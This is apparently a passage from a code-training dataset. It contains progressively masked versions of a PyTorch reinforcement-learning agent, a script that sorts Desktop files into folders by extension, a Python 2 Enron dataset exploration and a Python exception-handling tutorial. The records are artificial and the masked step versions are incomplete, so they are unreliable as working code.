self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-4": "import logging\nimport time\nimport random\nimport pickle\nimport os\nfrom sys import maxsize\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom baselines.common.schedules import LinearSchedule\nfrom abp.utils import clear_summary_path\nfrom abp.models.feature_q_model import feature_q_model\nfrom abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom\nimport numpy as np\nlogger = logging.getLogger('root')\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nIntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n\nclass SADQ_GQF(object):\n \"\"\"Adaptive which uses the SADQ algorithm\"\"\"\n\n def __init__(self, name, state_length, network_config, reinforce_config,\n feature_len, combine_decomposed_func, is_sigmoid=False,\n memory_resotre=True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n self.features = 0\n self.feature_len = feature_len\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = (self.reinforce_config.summaries_path +\n '/' + self.name)\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.\n feature_len, self.network_config.output_shape, network_config)\n self.beta_schedule = LinearSchedule(self.reinforce_config.\n beta_timesteps, initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.\n epsilon_timesteps, initial_p=self.reinforce_config.\n starting_epsilon, final_p=self.reinforce_config.final_epsilon)\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name, scalar_value=\n self.epsilon, global_step=self.steps)\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy=False, is_random=False):\n if self.learning:\n self.steps += 1\n if (self.previous_state is not None and self.learning and self.\n current_reward is not None):\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state, None, self.current_reward,\n state_crr.reshape(-1, self.state_length), 0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(\n Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n if (self.learning and self.steps % self.reinforce_config.\n 
replace_frequency == 0):\n logger.debug('Replacing target model for %s' % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n if (self.learning and self.steps > self.reinforce_config.\n update_start and self.steps % self.reinforce_config.\n update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n self.current_reward = 0\n self.previous_state = state[action]\n return choice, fv\n\n def disable_learning(self, is_save=False):\n logger.info('Disabled Learning for %s agent' % self.name)\n if is_save:\n self.save(force=True)\n self.learning = False\n self.episode = 0\n\n def enable_learning(self):\n logger.info('enabled Learning for %s agent' % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n episode_time = time.time() - self.episode_time\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n logger.info('End of Episode %d, Total reward %.2f, Epsilon %.2f' %\n (self.episode + 1, self.total_reward, self.epsilon))\n logger.debug(\n 'Episode Time: %.2fs (%.2fs), Prediction Time: %.2f, Update Time %.2f'\n % (episode_time, avg_time, self.prediction_time, self.update_time)\n )\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward, global_step=self.episode)\n self.memory.add(self.previous_state, None, self.current_reward,\n state.reshape(-1, self.state_length), 1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + '/adaptive.info'\n if self.network_config.network_path and os.path.exists(restore_path\n ) and self.memory_resotre:\n logger.info('Restoring state from %s' % self.network_config.\n network_path)\n with open(restore_path, 'rb') as file:\n info = pickle.load(file)\n self.steps = info['steps']\n self.episode = info['episode']\n self.memory.load(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n\n def save(self, force=False, appendix=''):\n info = {'steps': self.steps, 'best_reward_mean': self.\n best_reward_mean, 'episode': self.episode}\n if (len(self.reward_history) >= self.network_config.save_steps and \n self.episode % self.network_config.save_steps == 0 or force):\n total_reward = sum(self.reward_history[-self.network_config.\n save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n if force:\n print('*************saved*****************',\n current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info('Saving network. 
Found new best reward (%.2f)' %\n total_reward)\n self.eval_model.save_network(appendix=appendix)\n self.target_model.save_network(appendix=appendix)\n with open(self.network_config.network_path +\n '/adaptive.info', 'wb') as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print('lenght of memeory: ', len(self.memory))\n else:\n logger.info('The best reward is still %.2f. Not saving' %\n self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n\n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name, scalar_value=\n beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states, is_terminal, weights,\n batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes), global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector\n ) = batch\n states = FloatTensor(states)\n terminal = FloatTensor([(1 if t else 0) for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size, dtype=\n torch.long)\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns\n ).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n q_max.append(q_value_max)\n if self.network_config.version in ['v10', 'v11']:\n features_max[:, :3] = features_max[:, :3] * ns[idx, 65\n ] / states[i, 65]\n features_max[:, 3:6] = features_max[:, 3:6] * ns[idx, 66\n ] / states[i, 66]\n features_max[:, 6:9] = features_max[:, 6:9] * ns[idx, 63\n ] / states[i, 63]\n features_max[:, 9:12] = features_max[:, 9:12] * ns[idx, 64\n ] / states[i, 64]\n features_max[features_max == float('inf')] = 0\n f_max.append(features_max.view(-1))\n q_max = torch.stack(q_max, dim=1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n f_max = (1 - terminal.view(-1, 1)) * f_max\n q_target = reward + self.reinforce_config.discount_factor * q_max\n f_target = (features_vector + self.reinforce_config.discount_factor *\n f_max)\n if (torch.sum(feature_values != feature_values).item() + torch.sum(\n f_target != f_target)).item() > 0:\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-06\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, weight_dict):\n 
self.eval_model.load_weight(weight_dict)\n\n def load_model(self, model):\n self.eval_model.replace(model)\n\n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)\n",
"step-5": "import logging\nimport time\nimport random\nimport pickle\nimport os\nfrom sys import maxsize\n\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom baselines.common.schedules import LinearSchedule\n\nfrom abp.utils import clear_summary_path\nfrom abp.models.feature_q_model import feature_q_model\nfrom abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom\nimport numpy as np\n\nlogger = logging.getLogger('root')\nuse_cuda = torch.cuda.is_available()\nFloatTensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor\nLongTensor = torch.cuda.LongTensor if use_cuda else torch.LongTensor\nIntTensor = torch.cuda.IntTensor if use_cuda else torch.IntTensor\nByteTensor = torch.cuda.ByteTensor if use_cuda else torch.ByteTensor\nTensor = FloatTensor\n\n\nclass SADQ_GQF(object):\n \"\"\"Adaptive which uses the SADQ algorithm\"\"\"\n\n def __init__(self, name, state_length, network_config, reinforce_config, feature_len, combine_decomposed_func, is_sigmoid = False, memory_resotre = True):\n super(SADQ_GQF, self).__init__()\n self.name = name\n #self.choices = choices\n self.network_config = network_config\n self.reinforce_config = reinforce_config\n\n self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)\n\n self.learning = True\n self.explanation = False\n self.state_length = state_length\n\n self.features = 0\n self.feature_len = feature_len\n # Global\n self.steps = 0\n self.reward_history = []\n self.episode_time_history = []\n self.best_reward_mean = -maxsize\n self.episode = 0\n self.feature_len = feature_len\n self.features = None\n\n self.reset()\n self.memory_resotre = memory_resotre\n reinforce_summary_path = self.reinforce_config.summaries_path + \"/\" + self.name\n\n if not self.network_config.restore_network:\n clear_summary_path(reinforce_summary_path)\n else:\n self.restore_state()\n \n self.summary = SummaryWriter(log_dir=reinforce_summary_path)\n self.eval_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)\n self.target_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)\n# self.target_model.eval_mode()\n\n self.beta_schedule = LinearSchedule(self.reinforce_config.beta_timesteps,\n initial_p=self.reinforce_config.beta_initial,\n final_p=self.reinforce_config.beta_final)\n\n self.epsilon_schedule = LinearSchedule(self.reinforce_config.epsilon_timesteps,\n initial_p=self.reinforce_config.starting_epsilon,\n final_p=self.reinforce_config.final_epsilon)\n\n# def __del__(self):\n# self.save()\n# self.summary.close()\n\n def should_explore(self):\n self.epsilon = self.epsilon_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Epsilon' % self.name,\n scalar_value=self.epsilon,\n global_step=self.steps)\n\n return random.random() < self.epsilon\n\n def predict(self, state, isGreedy = False, is_random = False):\n \n if self.learning:\n self.steps += 1\n # add to experience\n if self.previous_state is not None and self.learning and self.current_reward is not None:\n state_crr = np.unique(state, axis=0)\n self.memory.add(self.previous_state,\n None,\n self.current_reward,\n state_crr.reshape(-1, self.state_length), 0,\n self.features)\n# print(\"not final : {}\".format(self.current_reward) )\n# print(0, self.features)\n if self.learning and self.should_explore() and not isGreedy:\n q_values = None\n fv = None\n choice = random.choice(list(range(len(state))))\n action = choice\n else:\n with 
torch.no_grad():\n features_vector, q_values = self.eval_model.predict_batch(Tensor(state))\n q_values = FloatTensor(q_values).view(-1)\n\n _, choice = q_values.max(0)\n action = choice\n fv = features_vector[choice]\n# print(\"q_value : {}\".format(q_values))\n# input()\n if self.learning and self.steps % self.reinforce_config.replace_frequency == 0:\n logger.debug(\"Replacing target model for %s\" % self.name)\n if self.reinforce_config.replace_frequency != 1:\n self.target_model.replace(self.eval_model)\n else:\n self.target_model.replace_soft(self.eval_model)\n# self.target_model.eval_mode()\n\n if (self.learning and\n self.steps > self.reinforce_config.update_start and\n self.steps % self.reinforce_config.update_steps == 0):\n self.update_time -= time.time()\n self.update()\n self.update_time += time.time()\n\n self.current_reward = 0\n self.previous_state = state[action]\n #self.previous_action = action\n\n return choice, fv#,q_values\n\n def disable_learning(self, is_save = False):\n logger.info(\"Disabled Learning for %s agent\" % self.name)\n if is_save:\n# self.save()\n self.save(force = True)\n self.learning = False\n self.episode = 0\n \n def enable_learning(self):\n logger.info(\"enabled Learning for %s agent\" % self.name)\n self.learning = True\n self.reset()\n\n def end_episode(self, state):\n if not self.learning:\n return\n# print(\"end:\")\n# print(self.current_reward)\n# input()\n episode_time = time.time() - self.episode_time\n\n self.reward_history.append(self.total_reward)\n self.episode_time_history.append(episode_time)\n total_time = sum(self.episode_time_history)\n avg_time = total_time / len(self.episode_time_history)\n\n logger.info(\"End of Episode %d, \"\n \"Total reward %.2f, \"\n \"Epsilon %.2f\" % (self.episode + 1,\n self.total_reward,\n self.epsilon))\n\n logger.debug(\"Episode Time: %.2fs (%.2fs), \"\n \"Prediction Time: %.2f, \"\n \"Update Time %.2f\" % (episode_time,\n avg_time,\n self.prediction_time,\n self.update_time))\n\n self.episode += 1\n self.summary.add_scalar(tag='%s/Episode Reward' % self.name,\n scalar_value=self.total_reward,\n global_step=self.episode)\n\n self.memory.add(self.previous_state,\n None,\n self.current_reward,\n state.reshape(-1, self.state_length), 1,\n self.features)\n# print(\"final : {}\".format(self.current_reward) )\n# input()\n# print(1, self.features)\n self.save()\n self.reset()\n\n def reset(self):\n self.episode_time = time.time()\n self.current_reward = 0\n self.total_reward = 0\n self.previous_state = None\n self.previous_action = None\n self.prediction_time = 0\n self.update_time = 0\n self.features = None\n\n def restore_state(self):\n restore_path = self.network_config.network_path + \"/adaptive.info\"\n if self.network_config.network_path and os.path.exists(restore_path) and self.memory_resotre:\n logger.info(\"Restoring state from %s\" % self.network_config.network_path)\n\n with open(restore_path, \"rb\") as file:\n info = pickle.load(file)\n\n self.steps = info[\"steps\"]\n# self.best_reward_mean = info[\"best_reward_mean\"]\n self.episode = info[\"episode\"]\n self.memory.load(self.network_config.network_path)\n print(\"lenght of memeory: \", len(self.memory))\n\n def save(self, force=False, appendix=\"\"):\n info = {\n \"steps\": self.steps,\n \"best_reward_mean\": self.best_reward_mean,\n \"episode\": self.episode\n }\n \n if (len(self.reward_history) >= self.network_config.save_steps and\n self.episode % self.network_config.save_steps == 0) or force:\n\n total_reward = 
sum(self.reward_history[-self.network_config.save_steps:])\n current_reward_mean = total_reward / self.network_config.save_steps\n\n if force: #or current_reward_mean >= self.best_reward_mean:\n print(\"*************saved*****************\", current_reward_mean, self.best_reward_mean)\n if not force:\n self.best_reward_mean = current_reward_mean\n logger.info(\"Saving network. Found new best reward (%.2f)\" % total_reward)\n self.eval_model.save_network(appendix = appendix)\n self.target_model.save_network(appendix = appendix)\n# self.eval_model.save_network()\n# self.target_model.save_network()\n with open(self.network_config.network_path + \"/adaptive.info\", \"wb\") as file:\n pickle.dump(info, file, protocol=pickle.HIGHEST_PROTOCOL)\n self.memory.save(self.network_config.network_path)\n print(\"lenght of memeory: \", len(self.memory))\n else:\n logger.info(\"The best reward is still %.2f. Not saving\" % self.best_reward_mean)\n\n def reward(self, r):\n self.total_reward += r\n self.current_reward += r\n\n def passFeatures(self, features):\n self.features = features.copy()\n return\n\n def summary_test(self, reward, epoch):\n self.summary.add_scalar(tag='%s/eval reward' % self.name,\n scalar_value=reward, global_step=epoch * 40)\n def summary_GVFs_loss(self, loss, epoch):\n self.summary.add_scalar(tag='%s/GVFs loss' % self.name,\n scalar_value=loss, global_step=epoch * 40)\n \n def update(self):\n if len(self.memory._storage) <= self.reinforce_config.batch_size:\n return\n# self.eval_model.train_mode()\n beta = self.beta_schedule.value(self.steps)\n self.summary.add_scalar(tag='%s/Beta' % self.name,\n scalar_value=beta, global_step=self.steps)\n if self.reinforce_config.use_prior_memory:\n batch = self.memory.sample(self.reinforce_config.batch_size, beta)\n (states, actions, reward, next_states,\n is_terminal, weights, batch_idxes) = batch\n self.summary.add_histogram(tag='%s/Batch Indices' % self.name,\n values=Tensor(batch_idxes),\n global_step=self.steps)\n else:\n batch = self.memory.sample(self.reinforce_config.batch_size)\n (states, actions, reward, next_states, is_terminal, features_vector) = batch\n\n states = FloatTensor(states)\n# print(states.size())\n# next_states = FloatTensor(next_states)\n terminal = FloatTensor([1 if t else 0 for t in is_terminal])\n reward = FloatTensor(reward)\n features_vector = FloatTensor(features_vector)\n batch_index = torch.arange(self.reinforce_config.batch_size,\n dtype=torch.long)\n # Current Q Values\n feature_values, q_values = self.eval_model.predict_batch(states)\n q_values = q_values.flatten()\n q_max = []\n f_max = []\n for i, ns in enumerate(next_states):\n feature_n, q_n = self.target_model.predict_batch(FloatTensor(ns).view(-1, self.state_length))\n q_value_max, idx = q_n.max(0)\n features_max = feature_n[idx]\n \n q_max.append(q_value_max)\n if self.network_config.version in [\"v10\", \"v11\"]:\n# print(features_max)\n# print(ns[idx, 63:67])\n# print(states[i, 63:67])\n# print(features_max.size(), FloatTensor(ns).view(-1, self.state_length).size(), states.size())\n features_max[:, :3] = (features_max[:, :3] * ns[idx, 65]) / states[i, 65]\n features_max[:, 3:6] = (features_max[:, 3:6] * ns[idx, 66]) / states[i, 66]\n features_max[:, 6:9] = (features_max[:, 6:9] * ns[idx, 63]) / states[i, 63]\n features_max[:, 9:12] = (features_max[:, 9:12] * ns[idx, 64]) / states[i, 64]\n features_max[features_max == float('inf')] = 0\n# print(features_max)\n# input()\n f_max.append(features_max.view(-1))\n \n# if torch.sum(terminal == 
torch.sum(features_vector, dim = 1)) != len(terminal):\n# print(terminal)\n# print(features_vector)\n# input()\n q_max = torch.stack(q_max, dim = 1).view(-1)\n f_max = torch.stack(f_max)\n q_max = (1 - terminal) * q_max\n \n f_max = (1 - terminal.view(-1, 1)) * f_max\n \n q_target = reward + self.reinforce_config.discount_factor * q_max\n \n f_target = features_vector + self.reinforce_config.discount_factor * f_max\n \n# if torch.sum(reward).item() > 0:\n# print(reward)\n# print(feature_values)\n# print(q_target)\n# print(q_values)\n# input()\n # update model\n if (torch.sum(feature_values != feature_values).item() + torch.sum(f_target != f_target)).item() > 0:\n\n# print(\"1\")\n# print(features_vector)\n# print(\"2\")\n# print(feature_values)\n# print(\"3\")\n# print(f_target)\n# print(\"4\")\n# print(f_max)\n# print(\"5\")\n# print(states.tolist())\n# input()\n f_target[f_target != f_target] = 0\n self.eval_model.fit(q_values, q_target, feature_values, f_target)\n\n # Update priorities\n if self.reinforce_config.use_prior_memory:\n td_errors = q_values - q_target\n new_priorities = torch.abs(td_errors) + 1e-6 # prioritized_replay_eps\n self.memory.update_priorities(batch_idxes, new_priorities.data)\n \n def load_model(self, model):\n self.eval_model.replace(model)\n \n def load_weight(self, weight_dict):\n self.eval_model.load_weight(weight_dict)\n \n def load_model(self, model):\n self.eval_model.replace(model)\n \n def load_weight(self, new_feature_weights, new_q_weights):\n self.eval_model.feautre_model.load_state_dict(new_feature_weights)\n self.eval_model.q_model.load_state_dict(new_q_weights)",
"step-ids": [
11,
16,
19,
22,
23
]
}
|
[
11,
16,
19,
22,
23
] |
#This program sorts the files on Desktop on the basis of file extension and move them in separate folders in Documents folder.
desktop_directory="/home/vineeth/Desktop/" #LINUX
destination_folder="/home/vineeth/Documents/" #LINUX
#desktop_directory="C:/Users/VINEETH/Desktop/" #Windows
#destination_folder="C:/Users/VINEETH/Documents/" #Windows
exclude_these = ['.desktop','.exe','.lnk']
import os
for eachfile in os.listdir(desktop_directory):
if os.path.isfile(desktop_directory+eachfile):
fileName, fileExtension = os.path.splitext(eachfile)
if(all(fileExtension!=e for e in exclude_these)):
ext=fileExtension[1:]
if not os.path.exists(destination_folder+ext):
os.mkdir(destination_folder+ext)
os.rename(desktop_directory+eachfile,destination_folder+ext+"/"+eachfile)
|
normal
|
{
"blob_id": "805b64a7bd727a88081a6ead574fff9b1542070f",
"index": 2023,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor eachfile in os.listdir(desktop_directory):\n if os.path.isfile(desktop_directory + eachfile):\n fileName, fileExtension = os.path.splitext(eachfile)\n if all(fileExtension != e for e in exclude_these):\n ext = fileExtension[1:]\n if not os.path.exists(destination_folder + ext):\n os.mkdir(destination_folder + ext)\n os.rename(desktop_directory + eachfile, destination_folder +\n ext + '/' + eachfile)\n",
"step-3": "desktop_directory = '/home/vineeth/Desktop/'\ndestination_folder = '/home/vineeth/Documents/'\nexclude_these = ['.desktop', '.exe', '.lnk']\n<mask token>\nfor eachfile in os.listdir(desktop_directory):\n if os.path.isfile(desktop_directory + eachfile):\n fileName, fileExtension = os.path.splitext(eachfile)\n if all(fileExtension != e for e in exclude_these):\n ext = fileExtension[1:]\n if not os.path.exists(destination_folder + ext):\n os.mkdir(destination_folder + ext)\n os.rename(desktop_directory + eachfile, destination_folder +\n ext + '/' + eachfile)\n",
"step-4": "desktop_directory = '/home/vineeth/Desktop/'\ndestination_folder = '/home/vineeth/Documents/'\nexclude_these = ['.desktop', '.exe', '.lnk']\nimport os\nfor eachfile in os.listdir(desktop_directory):\n if os.path.isfile(desktop_directory + eachfile):\n fileName, fileExtension = os.path.splitext(eachfile)\n if all(fileExtension != e for e in exclude_these):\n ext = fileExtension[1:]\n if not os.path.exists(destination_folder + ext):\n os.mkdir(destination_folder + ext)\n os.rename(desktop_directory + eachfile, destination_folder +\n ext + '/' + eachfile)\n",
"step-5": "#This program sorts the files on Desktop on the basis of file extension and move them in separate folders in Documents folder.\n\ndesktop_directory=\"/home/vineeth/Desktop/\" #LINUX\ndestination_folder=\"/home/vineeth/Documents/\" #LINUX\n\n#desktop_directory=\"C:/Users/VINEETH/Desktop/\" #Windows\n#destination_folder=\"C:/Users/VINEETH/Documents/\" #Windows\n\nexclude_these = ['.desktop','.exe','.lnk']\nimport os\nfor eachfile in os.listdir(desktop_directory):\n if os.path.isfile(desktop_directory+eachfile):\n fileName, fileExtension = os.path.splitext(eachfile)\n if(all(fileExtension!=e for e in exclude_these)):\n ext=fileExtension[1:]\n if not os.path.exists(destination_folder+ext):\n os.mkdir(destination_folder+ext)\n os.rename(desktop_directory+eachfile,destination_folder+ext+\"/\"+eachfile)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
"""
Starter code for exploring the Enron dataset (emails + finances);
loads up the dataset (pickled dict of dicts).
The dataset has the form:
enron_data["LASTNAME FIRSTNAME MIDDLEINITIAL"] = { features_dict }
{features_dict} is a dictionary of features associated with that person.
You should explore features_dict as part of the mini-project,
but here's an example to get you started:
enron_data["SKILLING JEFFREY K"]["bonus"] = 5600000
"""
import pickle
import math
enron_data = pickle.load(open("../final_project/final_project_dataset.pkl", "r"))
def print_it():
for x in enron_data:
print (x)
for y in enron_data[x]:
print (y,':',enron_data[x][y])
#print_it()
print "persons:", len(enron_data)
print "features:", len(enron_data["SKILLING JEFFREY K"])
pois = 0
for n in enron_data:
if enron_data[n]["poi"] == 1:
pois = pois + 1
print "nbr of poi:", pois
print "stock value James Prentice:", enron_data["PRENTICE JAMES"]["total_stock_value"]
print "Wesley Colwell sent mail to pois:", enron_data["COLWELL WESLEY"]["from_this_person_to_poi"], "times"
print "Jeffrey K Skilling exercised stock:", enron_data["SKILLING JEFFREY K"]["exercised_stock_options"]
print "money for Lay:", enron_data["LAY KENNETH L"]["total_payments"], ", Skilling:", enron_data["SKILLING JEFFREY K"]["total_payments"], " & Fastow:", enron_data["FASTOW ANDREW S"]["total_payments"]
salary = 0
email = 0
for n in enron_data:
if not enron_data[n]["salary"] == "NaN":
salary = salary + 1
if not enron_data[n]["email_address"] == "NaN":
email = email + 1
print "nbr of salary:", salary, ", email: ", email
total_pay = 0
for n in enron_data:
if enron_data[n]["total_payments"] == "NaN":
total_pay = total_pay + 1
print "% not salary:", (total_pay * 100 / len(enron_data)), ", ", total_pay
total_pay_pois = 0
for n in enron_data:
if enron_data[n]["poi"] == 1:
if enron_data[n]["total_payments"] == "NaN":
total_pay_pois = total_pay_pois + 1
print "% not salary & poi:", (total_pay_pois * 100 / pois)
|
normal
|
{
"blob_id": "c5d224a3d63d0d67bc7a48fecec156cca41cdcf7",
"index": 5129,
"step-1": "#!/usr/bin/python\n\n\"\"\" \n Starter code for exploring the Enron dataset (emails + finances);\n loads up the dataset (pickled dict of dicts).\n\n The dataset has the form:\n enron_data[\"LASTNAME FIRSTNAME MIDDLEINITIAL\"] = { features_dict }\n\n {features_dict} is a dictionary of features associated with that person.\n You should explore features_dict as part of the mini-project,\n but here's an example to get you started:\n\n enron_data[\"SKILLING JEFFREY K\"][\"bonus\"] = 5600000\n \n\"\"\"\n\nimport pickle\nimport math\n\nenron_data = pickle.load(open(\"../final_project/final_project_dataset.pkl\", \"r\"))\n\ndef print_it():\n for x in enron_data:\n print (x)\n for y in enron_data[x]:\n print (y,':',enron_data[x][y])\n\n#print_it()\n\nprint \"persons:\", len(enron_data)\nprint \"features:\", len(enron_data[\"SKILLING JEFFREY K\"])\n\npois = 0\nfor n in enron_data:\n if enron_data[n][\"poi\"] == 1:\n pois = pois + 1\n\nprint \"nbr of poi:\", pois\n\nprint \"stock value James Prentice:\", enron_data[\"PRENTICE JAMES\"][\"total_stock_value\"]\n\nprint \"Wesley Colwell sent mail to pois:\", enron_data[\"COLWELL WESLEY\"][\"from_this_person_to_poi\"], \"times\"\n\nprint \"Jeffrey K Skilling exercised stock:\", enron_data[\"SKILLING JEFFREY K\"][\"exercised_stock_options\"]\n\nprint \"money for Lay:\", enron_data[\"LAY KENNETH L\"][\"total_payments\"], \", Skilling:\", enron_data[\"SKILLING JEFFREY K\"][\"total_payments\"], \" & Fastow:\", enron_data[\"FASTOW ANDREW S\"][\"total_payments\"]\n\nsalary = 0\nemail = 0\nfor n in enron_data:\n if not enron_data[n][\"salary\"] == \"NaN\":\n salary = salary + 1\n if not enron_data[n][\"email_address\"] == \"NaN\":\n email = email + 1\n\nprint \"nbr of salary:\", salary, \", email: \", email\n\ntotal_pay = 0\nfor n in enron_data:\n if enron_data[n][\"total_payments\"] == \"NaN\":\n total_pay = total_pay + 1\n\nprint \"% not salary:\", (total_pay * 100 / len(enron_data)), \", \", total_pay\n\ntotal_pay_pois = 0\nfor n in enron_data:\n if enron_data[n][\"poi\"] == 1:\n if enron_data[n][\"total_payments\"] == \"NaN\":\n total_pay_pois = total_pay_pois + 1\n\nprint \"% not salary & poi:\", (total_pay_pois * 100 / pois)",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# *** Exception handling (exceptional events, exceptional situations) ***
# raising an exception
a=100
b=0
# "division by zero" - an example of an error (broken code)
# c=a/b
# the solution - exception handling (catching the exception)
# the "try-except" construct
# try:
#     c = a / b
#     print("Everything is fine")
# except:
#     # the code that runs in exceptional situations goes here,
#     # i.e. the "fallback" code
#     print("Something went wrong")
#     c=a/1
# # code that runs after the previous block may go here
# print("Result: ", c)
# handling multiple exceptions
# result=None
# try:
#     var = int(input("Enter a number, but not zero: "))
#     result = 50/var
#     # handling an exception of a specific type (class)
# except ZeroDivisionError: # in this example the exception type is ZeroDivisionError
#     print("You tried to divide by zero!")
#     result=50/1
# except ValueError as val_error: # in this example the exception type is ValueError
#     print(f"It looks like you did not enter a number. Info: {val_error}")
#     result=0
# # handling the generic (base) exception - catches all exceptions
# except Exception as err:
#     print(f"Something went wrong: {err}")
# print("Result: ", result)
# the "try-except-finally" construct
# try:
#     var=int(input("Enter a number: "))
#     c = 100/var
#     print("All good!")
# except ZeroDivisionError:
#     c=0
#     print("Attempted division by zero")
# finally:
#     # finally runs in any case, even if the program terminates abnormally,
#     # i.e. the critically important logic belongs here
#     print("Critically important action")
# print("Result", c)
# the "try-except-else-finally" construct
try:
    var=int(input("Enter a number: "))
    c = 100/var
    print("All good!")
except ZeroDivisionError:
    c=0
    print("Attempted division by zero")
else:
    # else runs only when no exception was raised
    print("Logic that runs only if there were no exceptions")
finally:
    # finally runs in any case, even if the program terminates abnormally,
    # i.e. the critically important logic belongs here
    print("Critically important action")
print("Result", c)
|
normal
|
{
"blob_id": "bb02ba68eb6629dad364b5f015680e4126e655f3",
"index": 6173,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n var = int(input('Введите число: '))\n c = 100 / var\n print('Полет нормальный!')\nexcept ZeroDivisionError:\n c = 0\n print('Попытка деления на ноль')\nelse:\n print('Логика, которая выполняется только если нет исключений')\nfinally:\n print('Критически важное действие')\nprint('Result', c)\n",
"step-3": "a = 100\nb = 0\ntry:\n var = int(input('Введите число: '))\n c = 100 / var\n print('Полет нормальный!')\nexcept ZeroDivisionError:\n c = 0\n print('Попытка деления на ноль')\nelse:\n print('Логика, которая выполняется только если нет исключений')\nfinally:\n print('Критически важное действие')\nprint('Result', c)\n",
